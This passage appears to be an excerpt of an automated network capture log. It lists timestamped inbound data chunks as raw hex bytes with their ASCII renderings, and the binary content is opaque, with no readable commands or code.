7a 7c 15 6a 6f 10 db bf 5d 12 6d a7 29 13 32 0f e2 6c 8c 71 2a a6 32 8c b3 e8 43 75 7f db cd 52 86 e5 21 d1 8d b6 7f 82 7c fe 90 cd 8e Data Ascii: +UH5D?ejKuR7Op4YtyT\Ue}N]dc$;IbX@QMTy"x1c>NPn SAnHH8p%SOj~bR!1^<\FK\|ir\\|kD7<\zF@LXjN!Zaf+sJA>az\|jo]m)2lq2CuR!\|
2022-08-05 09:32:58 UTC	158	IN	Data Raw: 02 0a be 0c 77 6f b9 39 fc d4 11 b3 61 0e 0e d4 75 74 64 32 cb a5 33 2a 1d 5a 8d 15 14 b9 09 5b 9f 79 04 d1 ab 85 76 37 22 09 a7 83 81 4f 66 e5 2f 1e 39 4c 45 ed ba 71 26 69 53 22 df df e3 ac bf 97 69 38 80 50 88 25 6d a1 56 17 44 c4 23 1c 40 71 e9 a6 10 b6 6e 2a 2d 84 c4 af 6f 29 ec 6b 00 3d b5 d3 21 2a 9e c7 9f e5 24 ac 9f c0 2e 44 b5 75 86 ae d9 1e 86 35 06 1b 05 f7 0c c5 4c d5 d0 52 f1 8e 3d 9f 2d bc ed ee a9 1d 8d a1 67 47 d6 0b ce 74 02 5d c0 96 46 43 2c 16 5e 7b 91 1e 74 52 24 00 09 6c ac 13 19 f1 48 e3 cf 0e 51 b9 c5 6b 5c 78 a8 43 c3 2c a0 e7 97 90 66 97 9c 70 49 45 7c f6 e4 68 ad ae 96 61 c4 3f 21 ae a5 6e 41 3d fe 55 58 10 17 fa 21 02 3b 56 ad 4d 75 cc 3f aa f3 42 e9 71 ba 84 7f 1e ee fb df c0 8d b1 7c e8 d5 2f cf 4f b9 34 8b d8 98 d0 0e 9a 09 Data Ascii: wo9autd23Z[yv7"Of/9LEq&iS"i8P%mVD#@qn-o)k=!*$.Du5LR=-gGt]FC,^{tR$lHQk\xC,fpIE\|ha?!nA=UX!;VMu?Bq\|/O4
2022-08-05 09:32:58 UTC	160	IN	Data Raw: 93 d4 e9 6f 85 27 ba 47 82 52 ea c1 e4 c7 da dd 06 83 22 ee d1 3c ec 6c 48 af c3 21 33 f6 73 b1 91 51 89 0b 93 bd 11 d5 be 4e e1 56 93 84 a7 86 ce dd 14 02 b3 48 6f 99 57 61 70 c2 60 cd 73 7e bd ec 78 8a e8 ba e4 b4 89 d5 2b 52 be a8 24 61 33 c0 45 5a 11 1f 2f 35 99 32 a4 20 c2 53 c4 bc b9 54 69 4e dd ec de b1 bf f3 4e 4c ff f0 06 b5 fe 0f 48 1a ba 45 de f1 6f 00 0f 48 86 4e eb cc 27 b1 29 19 3c ec cc 3d 69 92 8f 4a 26 b2 20 ce 09 68 e0 9f 64 ce 72 b6 ca 42 62 4d 5d 36 4f 74 39 39 d9 9e df 53 9d 21 fc e2 0d 5b c9 b9 6e 26 77 7d aa f0 3b d3 01 6b 68 7f 4e ac bb 01 41 d5 30 ea 32 d2 dd 3c 86 66 86 39 36 09 1d 62 2a 5b 45 20 69 7f 53 30 99 c1 d5 98 29 6c 34 99 ae 24 16 06 91 46 17 0e e9 2f 68 99 74 92 c9 d5 e3 4c 98 9b 9d f8 36 21 56 2a 61 b5 42 ab 90 bd 7e Data Ascii: o'GR"<lH!3sQNVHoWap`s~x+R$a3EZ/52 STiNNLHEoHN')<=iJ& hdrBbM]6Ot99S![n&w};khNA02<f96b[E iS0)l4$F/htL6!VaB~
2022-08-05 09:32:58 UTC	161	IN	Data Raw: f4 70 62 43 14 26 2d 68 36 31 73 51 b0 ab 64 78 ce bb 54 c8 5e a9 1f 96 ec 92 fd d0 63 a4 8a 62 17 5a d2 e5 b2 fe 58 90 8f 44 70 38 ca 1b 6c 48 32 8c 74 44 89 5f 57 2e 13 35 01 fb 72 b8 ef e5 b4 29 9f 08 25 ab 1a db 10 f1 62 4c 93 83 54 11 9e 1c c3 c4 45 ea c5 da b8 5b de 5c f7 00 89 a0 b6 77 c2 e6 81 c4 d0 fa 92 18 0e 45 9a 9d 6f 45 27 8c 0a 0c 93 49 4d 2e 37 d3 ef 1b 96 42 58 8d e2 68 70 35 f4 22 53 f0 fc b9 73 1d 6d 5c 20 b2 75 f1 88 84 32 4f 99 f2 2a 00 4d 81 60 e7 92 72 fc 21 94 cf 41 70 12 7d 01 64 ca ea 6d d9 88 69 38 8d 12 a3 ab d3 92 28 69 74 06 67 32 e5 89 35 78 04 8d a9 70 d6 2d 66 b8 e9 42 52 d2 43 b6 a2 14 69 98 51 6f 1c 94 12 3b 8a 4e 82 9f 5d a1 2a f9 38 2a 3c 7a b4 c0 8e 02 af 1c d9 c6 cc a6 61 89 2d 0a bd a3 4b 35 29 12 45 c4 98 1d 34 d4 Data Ascii: pbC&-h61sQdxT^cbZXDp8lH2tD_W.5r)%bLTE[\wEoE'IM.7BXhp5"Ssm\ u2OM`r!Ap}dmi8(itg25xp-fBRCiQo;N]8*<za-K5)E4
2022-08-05 09:32:58 UTC	162	IN	Data Raw: 18 87 69 d4 db 39 80 b4 9f 0f 91 ec 26 ff d0 a0 7c bf 87 a5 1d 4d d9 f4 c4 d5 7b 01 67 52 b3 d7 aa 33 f8 8f f7 2d 74 63 b5 05 ab 4a c4 f2 4b cd 01 c7 d5 66 c6 70 41 fa 2b c8 81 94 c3 58 b9 67 bb 55 88 8a 3d f3 ca a3 6e 97 dc 21 4d 4a a2 6c 5f c9 6d 3e 3b 9b 69 ab 0b d2 3d 81 bf 84 99 bb 92 bc cf dd 1f 0b aa 86 20 2b d5 05 1f 5a 54 24 38 5b 5f 50 be 67 af 44 48 c9 6e d0 3a 0d d8 f1 f0 13 05 c5 2a dd 2f a5 c3 25 7e fd 19 b7 39 07 ca c0 3c cf 2d e4 e1 75 f4 16 b3 74 92 a3 a5 84 51 93 0b 3d fb 97 af c2 e9 04 6c ca be 76 50 8a ed 54 2f 27 6b bf 6c 58 ba af c5 1e 02 8e 8d 42 03 10 6b 95 1b 42 45 b0 ef 5e 17 5f fe 04 96 94 b9 0c 56 8a 14 3e ff 8a 1b 8f f7 84 ee 7b 97 8a c8 96 04 92 57 c7 a6 c4 9f 6b da 3b 92 8c 2a e1 80 ed 7d 04 22 d9 24 ec 4c 60 63 7a 0a 13 e0 Data Ascii: i9&\|M{gR3-tcJKfpA+XgU=n!MJl_m>;i= +ZT$8[_PgDHn:/%~9<-utQ=lvPT/'klXBkBE^_V>{Wk;}"$L`cz
2022-08-05 09:32:58 UTC	163	IN	Data Raw: 05 48 33 3d 3b 86 0a e9 91 db d4 2b e2 d3 1d 5f 0a 47 90 cb 8e 67 7c 2c b1 74 ca 97 bf 0a 74 08 0f b3 41 57 62 71 78 32 6a 17 b8 11 88 43 68 6f d1 cc d8 3a 75 e2 67 7b 98 9e 22 80 48 c1 72 f6 f9 4a 5f 6a fe 9c 35 b2 ab 73 d8 5c 9a 1e f1 4a 9f f1 73 dc b9 ba e7 b3 5c 18 e8 94 94 72 15 76 00 a7 23 8c be e8 40 81 bc 62 d2 b6 7f 76 95 bf d9 15 60 4f 7c c4 83 c6 83 50 0c 9d 08 f1 e7 a0 67 87 e3 75 e6 b6 c2 72 2b 37 df 59 02 c6 b9 03 40 03 c6 a7 fa a6 f6 e2 62 da 91 63 4f c8 66 ca 70 10 39 64 ea 65 21 ba 02 4e 66 41 5a 17 35 42 13 75 bd 8e 15 74 7f 23 81 a0 24 49 6f 64 ad a5 3b be 2e 85 f3 96 6b a7 7c ee b4 db 1d ba 40 8c 35 68 f8 a2 2e 62 7d 48 4b 28 51 73 b6 e7 f4 93 65 ae cb 8e 50 f9 f8 d5 eb 76 27 31 04 3a 97 c9 3d 30 1b a2 11 f3 c9 56 0b 9a c3 8d 47 ce 40 Data Ascii: H3=;+_Gg\|,ttAWbqx2jCho:ug{"HrJ_j5s\Js\rv#@bv`O\|Pgur+7Y@bcOfp9de!NfAZ5But#$Iod;.k\|@5h.b}HK(QsePv'1:=0VG@
2022-08-05 09:32:58 UTC	164	IN	Data Raw: f8 e2 4e dd b8 29 96 cb 6f 68 89 c2 0e 40 be 0d f7 b6 f5 8f 4d 8e e0 a9 47 00 6d 27 20 a7 43 9b f2 8b 98 e1 70 11 1d 1a 43 63 ee 75 5e ed 11 1c 32 79 17 27 d7 e0 4c 1f 88 bf 88 5f e5 84 79 7c ed 4d 97 a3 22 26 42 96 a6 fb 7c 44 7b c5 08 21 40 da 0d 95 36 e6 04 f2 8c dc 08 3a 20 3a 84 08 df da c5 7a 68 26 40 ab ea 9e 54 d2 78 0d f0 5e fc 37 e6 95 d9 d8 81 59 ad f9 01 6b 52 71 e6 f3 9c 8e c0 81 61 04 46 f2 a1 9a c8 ad 49 be 1f 29 01 03 65 ad a1 6f 0f c2 85 2a 61 07 d6 0c 36 31 b6 f1 2c bd b7 82 59 ca 13 fc cd c2 83 59 e8 96 8d 2a 26 02 66 79 99 59 ef b4 6d 49 5d 84 f9 7e 36 a0 6b b0 fd a5 b3 2b ec 67 14 a5 23 54 f8 b6 ba 01 47 4a fd 8d 93 2a 21 ac 61 ff 39 82 66 59 9c 0b ef 39 3d 29 07 e3 ef 9c b5 7d 92 63 47 b7 49 11 bd c3 3a 75 cd b8 f8 82 7b 47 e9 33 59 Data Ascii: N)oh@MGm' CpCcu^2y'L_y\|M"&B\|D{!@6: :zh&@Tx^7YkRqaFI)eoa61,YY&fyYmI]~6k+g#TGJ*!a9fY9=)}cGI:u{G3Y
2022-08-05 09:32:58 UTC	165	IN	Data Raw: d2 0e 3a c2 9c 2d 34 17 54 cb ca 5a db 4c 58 05 22 a5 cf 14 fb b4 84 43 27 aa 98 30 d6 81 fa 1b 08 3b 41 ec 34 4a ed 10 19 77 8f 6b ee 21 ea 22 14 ef de bb f5 ae 80 4d 54 df 54 67 a3 77 a1 f7 c8 e7 9f 0a 89 60 10 fc 59 e4 f8 cc 9f ea 8b da f1 d1 c2 0b 32 54 9e 03 82 91 1b dc a8 b9 a9 e1 6e 62 f5 c2 bc d7 33 e3 1d a6 c3 e8 6b 89 b6 56 05 08 d0 c8 4a 3a 47 ce f9 8c 24 00 5e 2b 48 08 0d b5 4c 91 49 94 33 4f c0 c9 5f 6f 8b 63 68 9d f6 c4 e3 97 4a 24 95 8d fb ab 3a 5b db 19 1e d6 10 f7 f7 e1 67 5c fb a4 c2 c0 a0 6b 2c 26 3b e3 16 27 eb b7 c1 06 4b 2f f0 c3 f0 7c 1d 17 0a ad 87 1d 91 6c 0a e5 4d 28 80 29 54 53 ea 58 41 1d e7 61 dc ce 93 cb 3d 3d 91 29 2b 3e ce 6b 69 22 34 05 71 ef 8a c3 07 ff 0a 44 84 94 0b 62 33 8c ee f3 0a 5a 5d 72 20 99 91 87 52 e1 ae f0 cb Data Ascii: :-4TZLX"C'0;A4Jwk!"MTTgw`Y2Tnb3kVJ:G$^+HLI3O_ochJ$:[g\k,&;'K/\|lM()TSXAa==)+>ki"4qDb3Z]r R
2022-08-05 09:32:58 UTC	167	IN	Data Raw: a9 26 85 3f d4 1a 24 a9 47 ad e6 da d1 d3 16 37 3c f1 3f c7 66 ee da 91 79 88 ce 9c 9a a6 bb 1c 9a fa a6 29 cb a9 f8 01 d1 c4 08 24 bf 9c e9 ea 48 12 52 84 34 5e 98 cf aa d1 6f bd 35 7b 1a 8e e3 c3 70 ee 38 14 52 0e 9d 3d 7a fa 83 b7 12 f5 c2 03 a3 ac ed 5e 19 a0 a1 da 58 06 b1 e5 95 c5 34 d1 41 b7 3d d1 67 19 07 2d 6f 7d e1 36 16 fa 67 ae f3 ab 9d 0b 9a 0c 89 44 63 b1 33 82 c5 0f aa 75 7f a9 30 94 81 c5 1e e8 03 ed 8e de bc 09 0a 03 6f 0d 7a 18 30 27 3f 10 27 b1 e4 f6 3b c6 68 1c 97 31 fe 77 6a c9 57 19 de 72 91 6c 88 0c c7 2d 42 60 e0 92 4f 4e b2 92 d9 9e 6e a4 fd 0f 08 95 a5 84 2b e5 8e a3 ff be 7e 45 9e 43 f9 00 59 04 f7 3f 95 a3 eb f0 21 a5 3b 68 f2 80 b7 31 1a e9 93 fb 7b 68 9f 76 31 f4 2a 87 77 52 af d2 91 2d d9 b3 03 28 54 02 cc 6b 50 5d 11 55 5f Data Ascii: &?$G7<?fy)$HR4^o5{p8R=z^X4A=g-o}6gDc3u0oz0'?';h1wjWrl-B`ONn+~ECY?!;h1{hv1*wR-(TkP]U_
2022-08-05 09:32:58 UTC	168	IN	Data Raw: 94 a9 ff d8 33 e2 50 c4 31 63 74 32 c3 cb 7f d0 bc ef 16 23 2b dc 24 f2 a5 55 e0 80 d0 81 1e e8 f8 89 13 bf ba 6f 45 e5 8d 22 ba 33 15 1f 73 d3 5c 49 85 ca d8 45 9d 37 e4 2e 50 fd 1c c6 10 44 3a 9b 04 a9 b3 d3 b3 7c 2c 1a 51 4d 2d 7c 37 81 4b 79 9b 47 71 fd a2 93 94 e0 c7 a0 58 af 98 5b 88 e2 d7 6d ec 79 64 0b 58 75 e1 ff 38 94 df 9f 47 3b 4f 39 59 78 38 6a 0c 30 53 4e 81 b5 a1 5f 10 7d 51 51 3d d1 02 f0 72 5c 8e 67 ac b7 7b c3 5d ed 28 fb d5 20 22 6d c9 02 99 42 b5 31 c0 91 d5 c1 90 d1 f8 a3 a4 80 dc 51 87 35 96 cc ee f8 77 9e 91 aa b6 27 b9 98 d7 f5 bf d1 59 79 2a 29 79 18 79 37 76 37 4f 3f fe 99 a9 11 5b 16 52 4d ec 86 d9 6b a4 53 3a de 6f 82 2a fa 4f e4 73 92 c5 2e 77 91 d1 71 d9 79 af 80 6b e7 33 9a ab 55 3a 20 40 11 42 16 a7 39 85 4e 37 dd 2e b1 18 Data Ascii: 3P1ct2#+$UoE"3s\IE7.PD:\|,QM-\|7KyGqX[mydXu8G;O9Yx8j0SN_}QQ=r\g{]( "mB1Q5w'Yy)yy7v7O?[RMkS:oOs.wqyk3U: @B9N7.
2022-08-05 09:32:58 UTC	169	IN	Data Raw: 5c 19 65 7f 2d 4d 28 3f eb cc a8 6e f4 d4 43 ef 1b 93 fd 66 7f 4c f2 79 68 a9 e3 5a cb 7b 25 53 4f 4e ff 93 3b a4 a9 df 4a ab db 11 63 b7 d7 a3 d7 1a c2 19 0b d7 e7 14 dd 1a e0 93 95 7c 57 dd 2c 51 85 42 c9 ea 06 73 45 d4 83 dc 49 ff e9 ef 08 9c 8c 8b 91 f2 ab fa aa 83 b5 a6 f9 d0 a1 3e ee 1e 56 2c a1 9f 6d fb 8e c4 5a a9 81 9d a6 2c a3 56 f0 35 bc 28 3a 58 cb e0 75 dd ba 9f 6e f9 83 cc fe 53 57 92 7a 30 34 8a d2 0c 92 71 e0 dc a4 d3 19 72 7d cc 10 55 78 be d5 fd 3a b0 6a 73 eb 08 ef 21 96 7e 83 37 a7 9f 32 a9 95 3e fe 91 04 83 60 9e 56 9f 2e e1 15 20 14 91 8e 65 43 7d bf 21 2d a2 ee 09 3d d0 80 bd 9c 33 70 a3 04 e9 ec f7 98 e6 59 fc b2 9d cf 2a 3c dc aa 10 eb c2 4d a3 3e b5 3a df 5d 5c 57 56 05 9c 26 44 50 f2 49 4a c5 92 00 12 c9 03 d4 cf 86 c0 11 d5 45 Data Ascii: \e-M(?nCfLyhZ{%SON;Jc\|W,QBsEI>V,mZ,V5(:XunSWz04qr}Ux:js!~72>`V. eC}!-=3pY*<M>:]\WV&DPIJE
2022-08-05 09:32:58 UTC	171	IN	Data Raw: 78 7c a5 50 63 fb bd ec b3 88 ab 89 61 d8 ed f9 8d 63 9b ec 3c 28 d6 75 41 4c 4b ce a3 ac 21 ed 6b 2e d1 d3 2b 27 6f 07 a7 5d 01 dc 76 67 ac 3d 71 b3 2e 47 5c 1c 2c bb 34 21 ae 4e 97 be f4 f7 a1 b1 3f 78 fc 13 f2 d9 82 16 d6 26 9b ec e1 57 01 ff 21 63 c0 d4 c2 b0 92 8b d8 e6 da 93 86 b0 07 2a 5d fb 7e d5 5d cd c6 eb 9c 9b 29 a9 42 48 f7 5f 89 e4 35 63 a3 d7 79 12 8e 4d 18 a3 59 44 88 27 61 2f 3f c4 7b af 98 54 fc 26 a9 4a cc d3 1f 5e 92 d0 37 0d ad 7d 56 09 41 45 2c 53 e7 ef 4d ac d0 07 93 3c 1d d6 15 ff f9 47 f0 2b 8d 5c 9a b8 87 b4 90 07 06 d1 bd 48 65 41 9d 09 d9 bc 37 ef 0f 1c 7f c0 47 49 cc cf 6c 57 87 5c a5 70 cc 96 f3 c0 b4 64 31 1f d8 fe af d6 4a 9f bf fc d2 53 39 df 22 73 39 25 c7 82 70 9f f1 6a 57 92 8f 44 11 d8 ab 82 bd 87 38 72 31 be 1c 3b 5d Data Ascii: x\|Pcac<(uALK!k.+'o]vg=q.G\,4!N?x&W!c*]~])BH_5cyMYD'a/?{T&J^7}VAE,SM<G+\HeA7GIlW\pd1JS9"s9%pjWD8r1;]
2022-08-05 09:32:58 UTC	172	IN	Data Raw: b5 7f 8e 1d eb 0a 07 89 55 0b ac 71 e0 c2 be d9 65 a3 6a b4 92 72 b4 ad b9 2c 30 24 37 c5 23 5e 3e 8c dd 68 d5 5a b0 b8 44 bb f9 b1 c1 a6 5e 73 fd bb ca 08 9e 6c 81 3b b9 43 42 33 70 a0 8f ed 76 2f a1 2c d9 93 12 ee 48 e8 a3 e2 c6 6e 45 25 cf e5 90 38 16 9d 73 0e 09 4d f7 a0 31 85 fc 3c e0 ff 6e fe e0 0b 19 3e 40 3c 49 81 04 4b be ca 52 2a 8b f5 c1 ac b3 67 32 fe 7f 50 68 2a 98 84 24 68 04 91 2c 82 d3 7a ce 8b c0 37 79 e3 ed 26 33 a5 e7 1e e0 a3 28 51 84 16 dc 96 b1 40 13 b5 a4 af 36 4e b4 59 55 06 d9 f1 1f 73 ce bf 2d 93 50 37 3c 18 45 75 41 e3 2e 70 38 cf eb 77 f8 fc 3b 78 cb 69 26 0d 08 d7 b1 95 e1 7e 7a a0 c1 87 25 0d c0 67 12 2d 0e 02 e2 80 3c bd c2 9f 3c 54 d1 e1 14 12 c2 b1 e2 26 5f 5d ef 4d d4 a3 4f e4 e8 79 e4 0a 78 79 e0 89 75 d6 4b 90 58 61 ac Data Ascii: Uqejr,0$7#^>hZD^sl;CB3pv/,HnE%8sM1<n>@<IKRg2Ph$h,z7y&3(Q@6NYUs-P7<EuA.p8w;xi&~z%g-<<T&_]MOyxyuKXa
2022-08-05 09:32:58 UTC	173	IN	Data Raw: 49 58 ba 2c 70 4e 71 08 f2 32 88 3f 20 0d e1 ba 85 c1 89 fd cd 84 1e 33 63 75 68 9b 15 d0 d3 24 4e f8 be a0 b7 90 fb b2 0c cc 52 a4 69 ed 9a 66 91 89 bb a7 d7 b9 49 00 f1 b3 81 d7 a6 82 8b 32 ef d8 f1 16 3f ff 53 11 77 85 8a 7c e5 d6 05 41 a2 3e e7 0e 85 62 0d d9 1d f5 42 2e a7 fe f5 66 f1 b1 50 42 b4 6f 7b 7c 2a 70 8c ce 86 4f cb 7f 7e 05 0b d4 3b f8 23 2c 97 67 df 64 17 d8 af b2 04 28 f7 a4 bf 58 23 a8 2c 85 68 ba 77 83 ef 20 82 04 49 f4 ed a7 20 70 36 f0 da 26 9e f8 19 48 26 84 e8 76 d0 7f 1e ca f1 31 d0 fa 1c 1c ba d2 1d 1e 95 03 db 67 95 1e 98 2e 63 0a f0 22 a2 d5 3a 85 b0 ee 1c b4 77 a2 36 16 4e 2f 26 0a 60 7e 9a ab 38 b3 5a 61 b7 a5 2f ab 37 d9 1a 1c 43 8f 17 aa 7d 37 6b 6b 1b 48 91 fb c7 03 ac 29 9c 36 c6 19 83 01 60 e5 50 c8 81 1d ed ab 9f 0e 99 Data Ascii: IX,pNq2? 3cuh$NRifI2?Sw\|A>bB.fPBo{\|*pO~;#,gd(X#,hw I p6&H&v1g.c":w6N/&`~8Za/7C}7kkH)6`P
2022-08-05 09:32:58 UTC	174	IN	Data Raw: e7 35 e6 eb b7 48 9a 9a 1e ad 2c 7a 6e e1 de 06 0a b7 71 98 76 eb cc 2e 9f 46 92 f1 0b 90 36 ab 10 c3 d0 6a a0 a3 ac 05 a2 3b 2c de 83 56 db 0b 58 f5 0d 42 ab ad c6 4c ca 18 bf 80 f0 e4 eb 3c 3b 26 ff 65 4b 66 2b a8 fa 6e 6c 77 d7 e3 16 34 b0 c5 d4 43 94 84 61 e4 64 5f d6 09 5e b9 41 e8 d1 e6 4b c2 8c aa d6 8b 54 95 b5 c8 12 95 18 63 a7 fe ce 4f cd 98 d6 e2 73 07 f7 e2 9e a9 90 24 71 2b 21 c9 cd 83 f6 d9 82 e9 49 59 dd 00 33 ee fb 51 3c ff 5c 21 d0 c3 31 e3 ae e8 4c e3 1d f6 d6 bd 4f e1 f1 fb 88 b7 6d df 76 c2 25 df bd 4b c2 e4 e3 fc 67 57 a5 53 f9 14 8a 85 c7 f6 75 c7 d6 1f 84 ff 06 e7 25 67 01 9b 62 f0 4f fc 97 95 95 0a 87 e8 00 9d 34 c7 29 09 84 bc 6a b6 a6 66 90 c7 64 c3 cf 59 0f 3d 5c 6e ee af f7 cd 0a fd 28 97 2e 41 f9 3c e5 f6 7b ea af b7 b9 7f e5 Data Ascii: 5H,znqv.F6j;,VXBL<;&eKf+nlw4Cad_^AKTcOs$q+!IY3Q<\!1LOmv%KgWSu%gbO4)jfdY=\n(.A<{
2022-08-05 09:32:58 UTC	176	IN	Data Raw: e4 4a 78 c9 5d 65 4b ba 61 4e 59 a1 37 78 ee bc 6b 2e ca 47 0f db 70 83 cf 20 6c 29 7e 3c 3f dc ce 71 5a d7 ff 4b 55 3b 03 35 05 be 95 64 ef 35 6a f4 79 61 6d cd cb 7d 29 f2 66 39 33 cf b1 01 51 b3 18 66 4a 58 c3 1d 87 aa b9 6b 74 cf e9 0f 82 d6 c4 96 7f 98 76 66 fd be 62 f4 17 cf 29 70 d2 16 b3 d4 4e 7e c1 b1 1f c2 bb 73 c9 32 8a 8a ee d2 7d 5f 70 6e 3a 48 ea 1e 2f 96 a6 94 8c f0 97 df cb 7c 90 96 a4 22 d8 d4 de d7 74 4e f2 56 f0 3e e4 9c ff 23 4e b1 df c3 fb b1 1a 29 bf 3b dc 39 06 b1 fd 45 98 f2 70 7a 06 d9 b2 2a ca fa 60 d4 cc 38 cc cf 3a db 32 75 f9 64 d6 26 9f 4b 61 98 11 57 9b 05 ec c6 d2 56 64 44 3e 2d b3 50 a9 6c 22 24 e8 e3 8d 39 bb 18 92 ba a5 72 39 ee ac f3 ca d1 97 46 5e 1d 04 40 a6 c2 be fb 3e 4a 2e 86 13 55 a8 e8 56 51 00 25 61 19 79 88 bb Data Ascii: Jx]eKaNY7xk.Gp l)~<?qZKU;5d5jyam})f93QfJXktvfb)pN~s2}_pn:H/\|"tNV>#N);9Epz*`8:2ud&KaWVdD>-Pl"$9r9F^@>J.UVQ%ay
2022-08-05 09:32:58 UTC	177	IN	Data Raw: 21 41 14 f8 4f e2 5e fb aa e3 af f3 b7 56 3f 6f 01 13 1d dd 0c f8 86 da e7 a3 6a eb 61 9b 1d c6 24 2c e4 6e a1 18 dc 26 50 64 5c 9b 02 c9 85 7a 37 c1 3b 6c 93 dd a9 a5 57 28 5f 9b a0 1d c4 c8 d5 c1 fd b2 2a b7 77 07 07 46 8c 0f 01 ef 68 2c b6 91 a0 f1 1b 49 f7 6f 7c 77 b3 fc c7 da 75 33 77 0d 2d ff e1 0f 56 fe 4f 41 8f aa f9 c0 11 a7 81 03 0d b3 9d 7e 73 77 95 fb 03 54 29 a9 19 9b 19 16 2b 8c 26 a0 ec 00 b0 67 e8 67 55 53 c7 2f e0 a3 86 44 66 b6 22 a1 f6 97 d2 f9 26 2b e6 e0 7f ef f8 89 1d 2b 0d eb f4 f5 d7 c9 db c6 30 fd d8 82 85 f1 61 1d 50 00 59 d7 a7 7c c1 cb fa 6e 50 b9 5d 04 79 b0 b3 1d a5 f7 d2 1a 66 46 5b bc d3 22 15 fe ef 8c 92 27 2c dd b4 80 8c 0b e3 eb 6f 84 58 cf 47 25 d1 e6 78 9e cc 72 93 d9 bb 0b 62 de 8a 02 e5 bc 3b bd 79 52 62 26 d6 47 1d Data Ascii: !AO^V?oja$,n&Pd\z7;lW(_*wFh,Io\|wu3w-VOA~swT)+&ggUS/Df"&++0aPY\|nP]yfF["',oXG%xrb;yRb&G
2022-08-05 09:32:58 UTC	178	IN	Data Raw: b6 5b 37 05 e7 b0 a7 4c 35 d3 b4 af 67 15 67 4c c2 e0 18 98 a3 c3 b3 e6 18 52 a7 8d 98 85 78 56 99 90 d9 e9 e6 a8 da cb c7 f2 c6 d3 71 92 da ea a8 0b 4c ea a0 ce e0 07 b5 fd c6 c8 8d 87 aa e2 a6 99 76 61 a2 74 6a da fa 73 06 71 b4 d3 e4 6d 15 5c f6 0f aa 19 1f e8 6a 0d 39 49 9a 12 37 a6 28 1f cb e0 7b 52 e5 7f 5f 1d 36 b3 5d c9 8d c2 d5 b6 49 23 7a 92 2c 21 c9 e5 84 f2 a6 bd 22 04 e3 45 de 68 d7 99 50 8b 80 cf f9 68 e7 7c 7b 29 b7 8c db 7a f9 37 63 dd 44 86 ea 31 1c a4 37 2c 0a 24 90 f9 18 0a 38 66 56 b5 87 26 84 33 56 3a c1 92 19 48 85 d1 83 39 49 ef 0e 44 4c 95 4d 99 f3 93 88 8e a8 3d 9b 47 57 70 a1 8f e9 30 40 06 c5 45 72 56 6e ec e2 a7 f0 40 10 68 60 07 8a b3 a7 07 59 3f b5 b6 11 44 96 03 27 cb ad a6 b1 6f 99 4a 0a 03 49 f4 48 7d a3 76 ac b0 53 1e 65 Data Ascii: [7L5ggLRxVqLvatjsqm\j9I7({R_6]I#z,!"EhPh\|{)z7cD17,$8fV&3V:H9IDLM=GWp0@ErVn@h`Y?D'oJIH}vSe
2022-08-05 09:32:58 UTC	179	IN	Data Raw: 50 86 80 89 c1 f0 f2 3f 47 55 c6 de 7c 65 bf bd c0 96 e8 0c e7 ad 95 01 1f cf 86 6e 40 ca 48 6f 07 30 1a b5 40 f1 74 cf 19 e4 31 b5 4c 46 9e e9 c2 4c b5 89 e1 df 12 33 40 96 16 ba 98 34 46 88 14 b4 30 d8 a4 c4 40 4f 8e e2 1f ee 68 d2 be cf 9d 19 ce 7f 2f f0 b4 e4 cd 4c b3 b2 df 17 62 70 d8 26 43 e1 ef 2f c4 e1 97 63 c6 9e 87 0d f4 ae 3f 88 64 91 56 54 16 9c 50 bf f1 ec a8 af ff 46 ba f5 c5 2c a6 71 09 90 75 a8 00 c3 9f 41 98 d5 e0 11 03 3d 52 c7 b1 e0 92 da d5 5f 47 77 dc da 8c a2 89 d3 34 08 e4 b1 5f 6f 4a 83 ec f3 32 2f 96 25 bf 79 eb 79 64 44 85 bc 62 91 30 78 57 cd a7 30 1c 64 d5 f1 f0 a1 c3 81 86 60 06 3f 40 ab 64 bc 35 ae a7 71 6b 1e de 00 51 98 8f d6 e5 c8 0c 01 59 d9 4e 37 35 e2 7f 8c f7 6f df 29 c9 cc 65 5d 2e f2 8b a3 4a b5 69 fa dc ba fe 8d 2e Data Ascii: P?GU\|en@Ho0@t1LFL3@4F0@Oh/Lbp&C/c?dVTPF,quA=R_Gw4_oJ2/%yydDb0xW0d`?@d5qkQYN75o)e].Ji.
2022-08-05 09:32:58 UTC	180	IN	Data Raw: e1 8c ee 64 d8 f4 c6 4d e9 e0 80 94 9c ba 56 88 8b 31 e1 0f c8 99 a3 e1 39 a1 a0 bf c5 0a bc 4a cb 26 67 ab 84 7e 34 22 38 e6 c3 c3 cd 01 fd 8f e6 06 0a 63 3d 89 ed 2d 7f 66 dd 12 7e a7 74 eb 43 35 94 60 c5 b1 8d 84 f2 8b d2 0f 57 7f d6 d1 8a 03 2a 1d 1c e4 73 0c 5c 0d 7a 99 59 aa f5 fd 1c cd 1f b1 3d c4 0f 40 35 7d 79 d0 0f 17 86 95 53 f0 2d 34 e8 a6 01 1a 19 6f 63 0e 08 2a cc 29 2a 1a 56 11 f7 10 f1 5b fd ff dd 4e bf a2 ce 31 a3 01 f0 06 0e c5 bd 16 25 69 f1 33 1c 33 ef fb 72 44 ec 3f d3 3c ca 23 44 22 cc 69 38 9e fa 3c 2f 15 be 2d f3 dd 8c 01 34 b1 8f 1c aa 24 30 12 87 54 67 e1 c0 09 c5 fd 7a 6c 06 0f d8 29 88 b9 52 52 74 fc ed a1 8b 4f 48 f8 cf 7d 27 6e f9 fd ed 51 bf 11 29 64 87 3d 0c a8 9d f5 39 52 73 51 8c 05 bd 83 79 b7 36 e1 2e 8c e6 cb f3 ec 1a Data Ascii: dMV19J&g~4"8c=-f~tC5`Ws\zY=@5}yS-4oc)*V[N1%i33rD?<#D"i8</-4$0Tgzl)RRtOH}'nQ)d=9RsQy6.
2022-08-05 09:32:58 UTC	181	IN	Data Raw: ec d3 6f 84 80 ff fc 6a 43 74 ef 6c 75 6b d5 34 3e 36 1c cc 68 fa 55 72 b0 f9 8d 23 be 1d 42 12 fc 83 df 59 6d e1 bf a3 32 5b 1d 3f a4 15 09 9a e6 f6 4e 25 12 b8 d3 af 49 45 8b 40 89 61 50 e4 f2 9a b6 05 fd 83 fb 4a 5a e8 12 e1 30 11 ec 10 a5 f9 3b 87 91 a0 d6 15 36 41 47 92 c9 6a 73 8e bd b9 e9 77 3a 60 88 cb 52 1d 30 40 40 e7 cb bf 62 37 20 65 55 02 72 4e 78 10 3f 9a 12 20 b5 05 c3 5e 60 09 08 3c fd 85 08 f6 02 2f 4f ed 12 94 5f 31 87 45 83 9a a0 a7 76 e2 fe af cb 2e bc 41 89 b8 ed f9 ef 36 fb 5f 79 58 b9 25 b4 9a 1e 6b ec dc 72 41 b8 ac 98 8d ac 